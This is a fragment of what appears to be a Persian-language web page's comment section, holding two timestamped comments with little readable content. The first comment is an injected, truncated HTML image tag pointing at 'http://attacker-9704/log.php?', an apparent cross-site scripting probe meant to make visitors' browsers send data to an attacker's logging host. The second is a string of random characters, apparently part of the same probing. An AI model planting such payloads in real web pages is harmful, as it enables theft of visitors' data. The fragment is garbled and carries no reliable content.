2017/09/23 05:03:26, 05:03:26 AM, e
پاسخ

1<img sRc='http://attacker-9704/log.php?

e:
2017/09/23 05:03:27, 05:03:27 AM, e
پاسخ

1<gZ5KbW<

ارسال نظر